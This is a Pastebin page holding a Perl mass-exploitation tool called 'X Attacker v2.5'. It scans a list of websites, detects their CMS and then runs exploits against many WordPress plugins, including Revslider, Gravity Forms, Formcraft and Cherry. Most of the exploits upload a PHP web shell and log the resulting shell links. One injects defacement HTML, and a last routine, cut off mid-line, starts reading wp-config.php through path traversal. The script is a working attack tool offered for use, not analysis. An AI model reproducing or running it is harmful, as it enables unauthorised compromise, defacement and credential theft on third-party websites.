Advertisement
Guest User

joomla exploit

a guest
Dec 22nd, 2018
1,377
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 109.62 KB | None | 0 0
  1. #!/usr/bin/perl
  2.  
  3. #Coded By Mohamed Riahi 10/10/2017
  4. #don't Change my Rights
  5.  
  6. use if $^O eq "MSWin32", Win32::Console::ANSI;
  7. use Getopt::Long;
  8. use HTTP::Request;
  9. use LWP::UserAgent;
  10. use IO::Select;
  11. use HTTP::Cookies;
  12. use HTTP::Response;
  13. use Term::ANSIColor;
  14. use HTTP::Request::Common qw(POST);
  15. use HTTP::Request::Common qw(GET);
  16. use URI::URL;
  17. use IO::Socket::INET;
  18. my $ua = LWP::UserAgent->new;
  19. $ua->timeout(10);
  20.  
  21. my $datetime = localtime;
  22.  
  23. @months = qw(01 02 03 04 05 06 07 08 09 10 11 12);
  24. ($second, $minute, $hour, $dayOfMonth, $month, $yearOffset, $dayOfWeek, $dayOfYear, $daylightSavings) = localtime();
  25. $year = 1900 + $yearOffset;
  26. $month = "$months[$month]";
  27.  
  28. sub banner() {
  29. system("title X Attacker v2.5");
  30. if ($^O =~ /MSWin32/) {system("cls"); }else { system("clear"); }
  31. print color('bold green');
  32. print q(
  33. .o oOOOOOOOo OOOo
  34. Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
  35. OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
  36. OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
  37. `O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
  38. .OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
  39. OOOOO '"OOOOOOOOOOOOOOOO"` oOO
  40. oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
  41. oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
  42. OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
  43. "OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
  44. Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
  45. : .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO?
  46. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
  47. '%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
  48. `$" `OOOO' `O"Y ' `OOOO' o
  49. OP" : o
  50. );
  51.  
  52. print color('reset');
  53. print " ";
  54. print colored ("[ X Attacker v2.5 ]",'white on_red');
  55. print colored ("[ Coded By Mohamed Riahi ]\n",'white on_red');
  56. print " ";
  57. print colored ("[ Start At $datetime ]",'white on_red'),"\n\n";
  58. }
  59. banner();
  60. GetOptions(
  61. "l|list=s" => \$list,
  62. );
  63.  
  64. unless ($list) { help(); }
  65.  
  66.  
  67. sub help {
  68.  
  69. print item(),"You Have List Of Sites ?\n\n";
  70. print item('1'),"Yes\n";
  71. print item('2'),"No\n";
  72. print item('-'),"Choose : ";
  73.  
  74. $number=<STDIN>;
  75. chomp $number;}
  76. if($number eq '1')
  77. {
  78. print color('bold red')," [";
  79. print color('bold green'),"+";
  80. print color('bold red'),"] ";
  81. print color("bold white"),"Path your websites list : ";
  82. $list=<STDIN>;
  83. chomp $list;
  84. }
  85. if($number eq '2')
  86. {
  87. $list= "Sites.txt";
  88. system("perl dork.pl");
  89. }
  90. $tmp="tmp";
  91. if (-e $tmp){
  92. }else{
  93. mkdir $tmp or die "Error creating directory: $tmp";
  94. }
  95. $rez="Result";
  96. if (-e $rez){
  97. }else{
  98. mkdir $rez or die "Error creating directory: $rez";
  99. }
  100.  
  101. $a = 0;
  102. open (THETARGET, "<$list") || die "[-] Can't open the list websites file";
  103. @TARGETS = <THETARGET>;
  104. close THETARGET;
  105. $link=$#TARGETS + 1;
  106.  
  107. banner();
  108. print color("bold white"), "[+] Total sites : ";
  109. print color("bold red"), "".scalar(@TARGETS)."\n\n\n";
  110. print color('reset');
  111.  
  112. OUTER: foreach $site(@TARGETS){
  113. chomp($site);
  114. $a++;
  115. cms();
  116. }
  117.  
  118. ################ CMS DETCTER #####################
  119. sub cms(){
  120. $ua = LWP::UserAgent->new(keep_alive => 1);
  121. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  122. $ua->timeout (15);
  123. $lokomedia = "$site/smiley/1.gif";
  124. my $lokomediacms = $ua->get("$lokomedia")->content_type;
  125. $loko = "$site/rss.xml";
  126. my $lokomediacmstow = $ua->get("$loko")->content;
  127. my $cms = $ua->get("$site")->content;
  128.  
  129. if($cms =~/<script type=\"text\/javascript\" src=\"\/media\/system\/js\/mootools.js\"><\/script>| \/media\/system\/js\/|com_content|Joomla!/) {
  130. print color('bold white'),"[$a] $site - ";
  131. print color("bold green"), "Joomla\n\n";
  132. print color('reset');
  133. open(save, '>>tmp/joomla.txt');
  134. print save "$site\n";
  135. close(save);
  136. comjce();
  137. comedia();
  138. comjdownloads();
  139. comjdownloadsdef();
  140. comfabrik();
  141. comfabrikdef();
  142. comfabrik2();
  143. comfabrikdef2();
  144. comadsmanager();
  145. comusers();
  146. comweblinks();
  147. comjbcatalog();
  148. foxcontact();
  149. sexycontactform();
  150. comblog();
  151. comrokdownloads();
  152. extplorer();
  153. comjwallpapers();
  154. com_facileforms();
  155. mod_simplefileupload();
  156. }elsif($cms =~/wp-content|wordpress|xmlrpc.php/) {
  157. print color('bold white'),"[$a] $site - ";
  158. print color("bold green"), "WordPress\n\n";
  159. print color('reset');
  160. open(save, '>>tmp/Wordpress.txt');
  161. print save "$site\n";
  162. close(save);
  163. addblockblocker();
  164. blaze();
  165. catpro();
  166. cherry();
  167. downloadsmanager();
  168. formcraft();
  169. levoslideshow();
  170. powerzoomer();
  171. gravityforms();
  172. revslider();
  173. getconfig();
  174. showbiz();
  175. ads();
  176. slideshowpro();
  177. wpmobiledetector();
  178. wysija();
  179. inboundiomarketing();
  180. dzszoomsounds();
  181. reflexgallery();
  182. sexycontactform();
  183. wtffu();
  184. wpjm();
  185. phpeventcalendar();
  186. synoptic();
  187. Wpshop();
  188. cubed();
  189. RightNow();
  190. konzept();
  191. omnisecurefiles();
  192. pitchprint();
  193. satoshi();
  194. pinboard();
  195. barclaycart();
  196. wpinjection();
  197. }elsif($cms =~/Drupal|drupal|sites\/all|drupal.org/) {
  198. print color('bold white'),"[$a] $site - ";
  199. print color("bold green"), "DruPal\n\n";
  200. print color('reset');
  201. open(save, '>>tmp/drupal.txt');
  202. print save "$site\n";
  203. close(save);
  204. drupal();
  205. drupalgeddon();
  206. }elsif($cms =~/Prestashop|prestashop/) {
  207. print color('bold white'),"[$a] $site - ";
  208. print color("bold green"), "Prestashop\n\n";
  209. print color('reset');
  210. open(save, '>>tmp/Prestashop.txt');
  211. print save "$site\n";
  212. close(save);
  213. columnadverts();
  214. soopamobile();
  215. soopabanners();
  216. vtermslideshow();
  217. simpleslideshow();
  218. productpageadverts();
  219. homepageadvertise();
  220. homepageadvertise2();
  221. jro_homepageadvertise();
  222. attributewizardpro();
  223. oneattributewizardpro();
  224. attributewizardproOLD();
  225. attributewizardpro_x();
  226. advancedslider();
  227. cartabandonmentpro();
  228. cartabandonmentproOld();
  229. videostab();
  230. wg24themeadministration();
  231. fieldvmegamenu();
  232. wdoptionpanel();
  233. pk_flexmenu();
  234. pk_vertflexmenu();
  235. nvn_export_orders();
  236. megamenu();
  237. blocktestimonial();
  238. tdpsthemeoptionpanel();
  239. psmodthemeoptionpanel();
  240. masseditproduct();
  241. }elsif($lokomediacms =~/image\/gif/) {
  242. print color('bold white'),"[$a] $site - ";
  243. print color("bold green"), "Lokomedia\n\n";
  244. print color('reset');
  245. open(save, '>>tmp/lokomedia.txt');
  246. print save "$site\n";
  247. close(save);
  248. lokomedia();
  249. }elsif($lokomediacmstow =~/lokomedia/) {
  250. print color('bold white'),"[$a] $site - ";
  251. print color("bold green"), "Lokomedia\n\n";
  252. print color('reset');
  253. open(save, '>>tmp/lokomedia.txt');
  254. print save "$site\n";
  255. close(save);
  256. lokomedia();
  257. }else{
  258. print color('bold white'),"[$a] $site - ";
  259. print color("bold green"), "Unknown\n\n";
  260. open(save, '>>tmp/Unknown.txt');
  261. print color('reset');
  262. print save "$site\n";
  263. close(save);
  264. }
  265. }
  266.  
  267. ################ Adblock Blocker #####################
  268. sub addblockblocker(){
  269.  
  270. my $addblockurl = "$site/wp-admin/admin-ajax.php?action=getcountryuser&cs=2";
  271. my $response = $ua->post($addblockurl, Content_Type => 'multipart/form-data', Content => [popimg => ["XAttacker.php"],]);
  272. $addblockup="$site/wp-content/uploads/$year/$month/XAttacker.php?X=Attacker";
  273. my $checkaddblock = $ua->get("$addblockup")->content;
  274.  
  275. if($checkaddblock =~/X Attacker/) {
  276. print item(),"Adblock Blocker";
  277. print color('bold white')," ................... ";
  278. print color('bold green'),"VULN\n";
  279. print item(),"Shell Uploaded Successfully\n";
  280. print color('bold white')," [Link] => $addblockup\n";
  281. open (TEXT, '>>Result/Shells.txt');
  282. print TEXT "$addblockup\n";
  283. close (TEXT);
  284. }else{
  285. print item(),"Adblock Blocker";
  286. print color('bold white')," ................... ";
  287. print color('bold red'),"NOt VULN\n";
  288. }
  289. }
  290.  
  291. ################ Blaze #####################
  292. sub blaze(){
  293. my $url = "$site/wp-admin/admin.php?page=blaze_manage";
  294. my $blazeres = $ua->post($url, Content_Type => 'multipart/form-data', Content => [album_img => ["XAttacker.php"], task => 'blaze_add_new_album', album_name => '', album_desc => '',]);
  295.  
  296. if ($blazeres->content =~ /\/uploads\/blaze\/(.*?)\/big\/XAttacker.php/) {
  297. $uploadfolder=$1;
  298. $blazeup="$site/wp-content/uploads/blaze/$uploadfolder/big/XAttacker.php?X=Attacker";
  299. print item(),"Blaze";
  300. print color('bold white')," ............................. ";
  301. print color('bold green'),"VULN\n";
  302. print item(),"Shell Uploaded Successfully\n";
  303. print color('bold white')," [Link] => $blazeup\n";
  304. open (TEXT, '>>Result/Shells.txt');
  305. print TEXT "$blazeup\n";
  306. close (TEXT);
  307. }else{
  308. print item(),"Blaze";
  309. print color('bold white')," ............................. ";
  310. print color('bold red'),"NOt VULN\n";
  311. }
  312. }
  313.  
  314. ################ Catpro #####################
  315. sub catpro(){
  316. my $url = "$site/wp-admin/admin.php?page=catpro_manage";
  317. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [album_img => ["XAttacker.php"], task => 'cpr_add_new_album', album_name => '', album_desc => '',]);
  318.  
  319. if ($response->content =~ /\/uploads\/catpro\/(.*?)\/big\/XAttacker.php/) {
  320. $uploadfolder=$1;
  321. $catproup="$site/wp-content/uploads/catpro/$uploadfolder/big/XAttacker.php?X=Attacker";
  322. print item(),"Catpro";
  323. print color('bold white')," ............................ ";
  324. print color('bold green'),"VULN\n";
  325. print item(),"Shell Uploaded Successfully\n";
  326. print color('bold white')," [Link] => $catproup\n";
  327. open (TEXT, '>>Result/Shells.txt');
  328. print TEXT "$catproup\n";
  329. close (TEXT);
  330. }else{
  331. print item(),"Catpro";
  332. print color('bold white')," ............................ ";
  333. print color('bold red'),"NOt VULN\n";
  334. }
  335. }
  336.  
  337.  
  338. ################ Cherry Plugin #####################
  339. sub cherry(){
  340. my $url = "$site/wp-content/plugins/cherry-plugin/admin/import-export/upload.php";
  341. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [file => ["XAttacker.php"],]);
  342.  
  343. $cherryup="$site/wp-content/plugins/cherry-plugin/admin/import-export/XAttacker.php?X=Attacker";
  344.  
  345. my $checkcherry = $ua->get("$cherryup")->content;
  346. if($checkcherry =~/X Attacker/) {
  347. print item(),"Cherry Plugin";
  348. print color('bold white')," ..................... ";
  349. print color('bold green'),"VULN\n";
  350. print item(),"Shell Uploaded Successfully\n";
  351. print color('bold white')," [Link] => $cherryup\n";
  352. open (TEXT, '>>Result/Shells.txt');
  353. print TEXT "$cherryup\n";
  354. close (TEXT);
  355. }else{
  356. print item(),"Cherry Plugin";
  357. print color('bold white')," ..................... ";
  358. print color('bold red'),"NOt VULN\n";
  359. }
  360. }
  361.  
  362. ################ Download Manager #####################
  363. sub downloadsmanager(){
  364. $downloadsmanagervuln="$site/wp-content/plugins/downloads-manager/readme.txt";
  365. my $url = "$site";
  366. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [upfile => ["XAttacker.php"], dm_upload => '',]);
  367. $dmup="$site/wp-content/plugins/downloads-manager/upload/XAttacker.php?X=Attacker";
  368. my $checkdm = $ua->get("$dmup")->content;
  369. if($checkdm =~/X Attacker/) {
  370. print item(),"Download Manager";
  371. print color('bold white')," .................. ";
  372. print color('bold green'),"VULN\n";
  373. print item(),"Shell Uploaded Successfully\n";
  374. print color('bold white')," [Link] => $dmup\n";
  375. open (TEXT, '>>Result/Shells.txt');
  376. print TEXT "$dmup\n";
  377. close (TEXT);
  378. }else{
  379. print item(),"Download Manager";
  380. print color('bold white')," .................. ";
  381. print color('bold red'),"NOt VULN\n";
  382. }
  383. }
  384.  
  385. ################ Formcraft #####################
  386. sub formcraft(){
  387. my $url = "$site/wp-content/plugins/formcraft/file-upload/server/php/";
  388. my $shell ="XAttacker.php";
  389. my $field_name = "files[]";
  390.  
  391. my $response = $ua->post($url, Content_Type => 'multipart/form-data', content => [ $field_name => [$shell]]);
  392. $formcraftup="$site/wp-content/plugins/formcraft/file-upload/server/php/files/XAttacker.php?X=Attacker";
  393.  
  394. if ($response->content =~ /{"files/) {
  395. print item(),"Formcraft";
  396. print color('bold white')," ......................... ";
  397. print color('bold green'),"VULN\n";
  398. print item(),"Shell Uploaded Successfully\n";
  399. print color('bold white')," [Link] => $formcraftup\n";
  400. open (TEXT, '>>Result/Shells.txt');
  401. print TEXT "$formcraftup\n";
  402. close (TEXT);
  403. }else{
  404. print item(),"Formcraft";
  405. print color('bold white')," ......................... ";
  406. print color('bold red'),"NOt VULN\n";
  407. }
  408. }
  409.  
  410. ################ levoslideshow #####################
  411. sub levoslideshow(){
  412.  
  413. my $url = "$site/wp-admin/admin.php?page=levoslideshow_manage";
  414. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [album_img => ["XAttacker.php"], task => 'lvo_add_new_album', album_name => '', album_desc => '',]);
  415.  
  416. if ($response->content =~ /\/uploads\/levoslideshow\/(.*?)\/big\/XAttacker.php/) {
  417. $uploadfolder=$1;
  418. $levoslideshowup="$site/wp-content/uploads/levoslideshow/$uploadfolder/big/XAttacker.php?X=Attacker";
  419. print item(),"levoslideshow";
  420. print color('bold white')," ..................... ";
  421. print color('bold green'),"VULN\n";
  422. print item(),"Shell Uploaded Successfully\n";
  423. print color('bold white')," [Link] => $levoslideshowup\n";
  424. open (TEXT, '>>Result/Shells.txt');
  425. print TEXT "$levoslideshowup\n";
  426. close (TEXT);
  427. }else{
  428. print item(),"levoslideshow";
  429. print color('bold white')," ..................... ";
  430. print color('bold red'),"NOt VULN\n";
  431. }
  432. }
  433.  
  434. ################ Power Zoomer #####################
  435. sub powerzoomer(){
  436. my $url = "$site/wp-admin/admin.php?page=powerzoomer_manage";
  437.  
  438. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [album_img => ["XAttacker.php"], task => 'pwz_add_new_album', album_name => '', album_desc => '',]);
  439.  
  440. if ($response->content =~ /\/uploads\/powerzoomer\/(.*?)\/big\/XAttacker.php/) {
  441. $uploadfolder=$1;
  442. $zoomerup="$site/wp-content/uploads/powerzoomer/$uploadfolder/big/XAttacker.php?X=Attacker";
  443. print item(),"Power Zoomer";
  444. print color('bold white')," ...................... ";
  445. print color('bold green'),"VULN\n";
  446. print item(),"Shell Uploaded Successfully\n";
  447. print color('bold white')," [Link] => $zoomerup\n";
  448. open (TEXT, '>>Result/Shells.txt');
  449. print TEXT "$zoomerup\n";
  450. close (TEXT);
  451. }else{
  452. print item(),"Power Zoomer";
  453. print color('bold white')," ...................... ";
  454. print color('bold red'),"NOt VULN\n";
  455. }
  456. }
  457.  
  458. ################ Gravity Forms #####################
  459. sub gravityforms(){
  460. my $url = "$site/?gf_page=upload";
  461. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  462. $ua->timeout(10);
  463. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  464.  
  465. my $gravityformsres = $ua->post($url, Content_Type => "form-data", Content => [file => ["XAttacker2.jpg"], field_id => "3", form_id => "1",gform_unique_id => "../../../", name => "css.php.jd"]);
  466.  
  467. $gravityformsup = "$site/wp-includes/wp-footer.php?X=Attacker";
  468. my $check = $ua->get("$site/wp-content/uploads/_input_3_css.php.jd")->content;
  469. my $checkk = $ua->get("$site/wp-includes/wp-footer.php")->content;
  470. if($checkk =~/X Attacker/) {
  471. print item(),"Gravity Forms";
  472. print color('bold white')," ............... ";
  473. print color('bold green'),"VULN\n";
  474. print item(),"Shell Uploaded Successfully\n";
  475. print color('bold white')," [Link] => $gravityformsup\n";
  476. open (TEXT, '>>Result/Shells.txt');
  477. print TEXT "$gravityformsup\n";
  478. close (TEXT);
  479. }
  480. else{
  481. gravityforms2();
  482. }
  483. }
  484.  
  485. ################ Gravity Forms #####################
  486. sub gravityforms2(){
  487. my $url = "$site/?gf_page=upload";
  488. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  489. $ua->timeout(10);
  490. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  491.  
  492. my $gravityformsres2 = $ua->post($url, Content_Type => 'multipart/form-data', Content => [file => ["index.jpg"], form_id => '1', name => 'Psyco.html', gform_unique_id => '../../../../../', field_id => '3',]);
  493. $gravityformsupp = "$site/_input_3_Psyco.html";
  494. my $checkgravityformsupp = $ua->get("$gravityformsupp")->content;
  495. if ($checkgravityformsupp =~ /HaCKeD/) {
  496.  
  497. print item(),"Gravity Forms";
  498. print color('bold white')," ............... ";
  499. print color('bold green'),"VULN\n";
  500. print color('bold green')," [";
  501. print color('bold red'),"-";
  502. print color('bold green'),"] ";
  503. print color('bold red'),"Shell Not Uploaded\n";
  504. print color('bold green')," [";
  505. print color('bold red'),"-";
  506. print color('bold green'),"] ";
  507. print color('bold white'),"Index Uploaded Successfully\n";
  508. print color('bold white')," [Link] => $gravityformsupp\n";
  509. open (TEXT, '>>Result/Index.txt');
  510. print TEXT "$gravityformsupp\n";
  511. close (TEXT);
  512. }
  513. else{
  514. print item(),"Gravity Forms";
  515. print color('bold white')," ..................... ";
  516. print color('bold red'),"NOt VULN\n";
  517. }
  518. }
  519.  
  520. ################ Revslider upload shell #####################
  521. sub revslider(){
  522. my $url = "$site/wp-admin/admin-ajax.php";
  523.  
  524. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  525. $ua->timeout(10);
  526. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  527.  
  528. my $revslidres = $ua->post($url, Cookie => "", Content_Type => "form-data", Content => [action => "revslider_ajax_action", client_action => "update_plugin", update_file => ["XAttackerevs.zip"]]);
  529.  
  530. my $revs = $ua->get("$site/wp-content/plugins/revslider/temp/update_extract/revslider/XAttacker.php")->content;
  531. my $revavada = $ua->get("$site/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php")->content;
  532. my $revstriking = $ua->get("$site/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php")->content;
  533. my $revincredible = $ua->get("$site/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php")->content;
  534. my $revultimatum = $ua->get("$site/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/revslider/XAttacker.php")->content;
  535. my $revmedicate = $ua->get("$site/wp-content/themes/medicate/script/revslider/temp/update_extract/revslider/XAttacker.php")->content;
  536. my $revcentum = $ua->get("$site/wp-content/themes/centum/revslider/temp/update_extract/revslider/XAttacker.php")->content;
  537. my $revbeachapollo = $ua->get("$site/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/revslider/XAttacker.php")->content;
  538. my $revcuckootap = $ua->get("$site/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php")->content;
  539. my $revpindol = $ua->get("$site/wp-content/themes/pindol/revslider/temp/update_extract/revslider/XAttacker.php")->content;
  540. my $revdesignplus = $ua->get("$site/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php")->content;
  541. my $revrarebird = $ua->get("$site/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php")->content;
  542. my $revandre = $ua->get("$site/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php")->content;
  543.  
  544. if($revs =~ /X Attacker/){
  545. print item(),"Revslider";
  546. print color('bold white')," ......................... ";
  547. print color('bold green'),"VULN\n";
  548. print item(),"Shell Uploaded Successfully\n";
  549. print color('bold white')," [Link] => $site/wp-content/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  550. open (TEXT, '>>Result/Shells.txt');
  551. print TEXT "$site/wp-content/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  552. close (TEXT);
  553. }elsif($revavada =~ /X Attacker/){
  554. print item(),"Revslider";
  555. print color('bold white')," ......................... ";
  556. print color('bold green'),"VULN\n";
  557. print item(),"Shell Uploaded Successfully\n";
  558. print color('bold white')," [Link] => $site/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  559. open (TEXT, '>>Result/Shells.txt');
  560. print TEXT "$site/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  561. close (TEXT);
  562. }elsif($revstriking =~ /X Attacker/){
  563. print item(),"Revslider";
  564. print color('bold white')," ......................... ";
  565. print color('bold green'),"VULN\n";
  566. print item(),"Shell Uploaded Successfully\n";
  567. print color('bold white')," [Link] => $site/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  568. open (TEXT, '>>Result/Shells.txt');
  569. print TEXT "$site/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  570. close (TEXT);
  571. }elsif($revincredible =~ /X Attacker/){
  572. print item(),"Revslider";
  573. print color('bold white')," ......................... ";
  574. print color('bold green'),"VULN\n";
  575. print item(),"Shell Uploaded Successfully\n";
  576. print color('bold white')," [Link] => $site/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  577. open (TEXT, '>>Result/Shells.txt');
  578. print TEXT "$site/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  579. close (TEXT);
  580. }elsif($revmedicate =~ /X Attacker/){
  581. print item(),"Revslider";
  582. print color('bold white')," ......................... ";
  583. print color('bold green'),"VULN\n";
  584. print item(),"Shell Uploaded Successfully\n";
  585. print color('bold white')," [Link] => $site/wp-content/themes/medicate/script/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  586. open (TEXT, '>>Result/Shells.txt');
  587. print TEXT "$site$site/wp-content/themes/medicate/script/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  588. close (TEXT);
  589. }elsif($revultimatum =~ /X Attacker/){
  590. print item(),"Revslider";
  591. print color('bold white')," ......................... ";
  592. print color('bold green'),"VULN\n";
  593. print item(),"Shell Uploaded Successfully\n";
  594. print color('bold white')," [Link] => $site/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  595. open (TEXT, '>>Result/Shells.txt');
  596. print TEXT "$site/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  597. close (TEXT);
  598. }elsif($revcentum =~ /X Attacker/){
  599. print item(),"Revslider";
  600. print color('bold white')," ......................... ";
  601. print color('bold green'),"VULN\n";
  602. print item(),"Shell Uploaded Successfully\n";
  603. print color('bold white')," [Link] => $site/wp-content/themes/centum/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  604. open (TEXT, '>>Result/Shells.txt');
  605. print TEXT "$site/wp-content/themes/centum/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  606. close (TEXT);
  607. }elsif($revbeachapollo =~ /X Attacker/){
  608. print item(),"Revslider";
  609. print color('bold white')," ......................... ";
  610. print color('bold green'),"VULN\n";
  611. print item(),"Shell Uploaded Successfully\n";
  612. print color('bold white')," [Link] => $site/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  613. open (TEXT, '>>Result/Shells.txt');
  614. print TEXT "$site/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  615. close (TEXT);
  616. }elsif($revcuckootap =~ /X Attacker/){
  617. print item(),"Revslider";
  618. print color('bold white')," ......................... ";
  619. print color('bold green'),"VULN\n";
  620. print item(),"Shell Uploaded Successfully\n";
  621. print color('bold white')," [Link] => $site/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  622. open (TEXT, '>>Result/Shells.txt');
  623. print TEXT "$site/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  624. close (TEXT);
  625. }elsif($revpindol =~ /X Attacker/){
  626. print item(),"Revslider";
  627. print color('bold white')," ......................... ";
  628. print color('bold green'),"VULN\n";
  629. print item(),"Shell Uploaded Successfully\n";
  630. print color('bold white')," [Link] => $site/wp-content/themes/pindol/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  631. open (TEXT, '>>Result/Shells.txt');
  632. print TEXT "$site/wp-content/themes/pindol/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  633. close (TEXT);
  634. }elsif($revdesignplus =~ /X Attacker/){
  635. print item(),"Revslider";
  636. print color('bold white')," ......................... ";
  637. print color('bold green'),"VULN\n";
  638. print item(),"Shell Uploaded Successfully\n";
  639. print color('bold white')," [Link] => $site/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  640. open (TEXT, '>>Result/Shells.txt');
  641. print TEXT "$site/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  642. close (TEXT);
  643. }elsif($revrarebird =~ /X Attacker/){
  644. print item(),"Revslider";
  645. print color('bold white')," ......................... ";
  646. print color('bold green'),"VULN\n";
  647. print item(),"Shell Uploaded Successfully\n";
  648. print color('bold white')," [Link] => $site/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  649. open (TEXT, '>>Result/Shells.txt');
  650. print TEXT "$site/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  651. close (TEXT);
  652. }elsif($revandre =~ /X Attacker/){
  653. print item(),"Revslider";
  654. print color('bold white')," ......................... ";
  655. print color('bold green'),"VULN\n";
  656. print item(),"Shell Uploaded Successfully\n";
  657. print color('bold white')," [Link] => $site/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  658. open (TEXT, '>>Result/Shells.txt');
  659. print TEXT "$site/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
  660. close (TEXT);
  661. }else{
  662. print item(),"Revslider Upload Shell";
  663. print color('bold white')," ............ ";
  664. print color('bold red'),"NOt VULN\n";
  665. revsliderajax();
  666. }
  667. }
  668.  
  669. ################ Revslider ajax #####################
  670. sub revsliderajax(){
  671. my $url = "$site/wp-admin/admin-ajax.php";
  672.  
  673. my $revslidajaxres = $ua->post($url, Cookie => "", Content_Type => "form-data", Content => [action => "revslider_ajax_action", client_action => "update_captions_css", data => "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'><center><b>HaCKeD BY Mohamed Riahi<b>"]);
  674.  
  675. $revsliderajax = $site . '/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css';
  676.  
  677. my $checkrevsajax = $ua->get("$revsliderajax")->content;
  678. if($checkrevsajax =~ /HaCKeD/){
  679. print item(),"Revslider Dafece Ajax";
  680. print color('bold white')," ............. ";
  681. print color('bold green'),"VULN\n";
  682. print color('bold green')," [";
  683. print color('bold red'),"-";
  684. print color('bold green'),"] ";
  685. print color('bold white'),"Defaced Successfully\n";
  686. print color('bold white')," [Link] => $revsliderajax\n";
  687. open (TEXT, '>>Result/Index.txt');
  688. print TEXT "$revsliderajax\n";
  689. close (TEXT);
  690. }else{
  691. print item(),"Revslider Dafece Ajax";
  692. print color('bold white')," ............. ";
  693. print color('bold red'),"NOt VULN\n";
  694. }
  695. }
  696.  
  697. sub getconfig{
  698. $url = "$site/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php";
  699.  
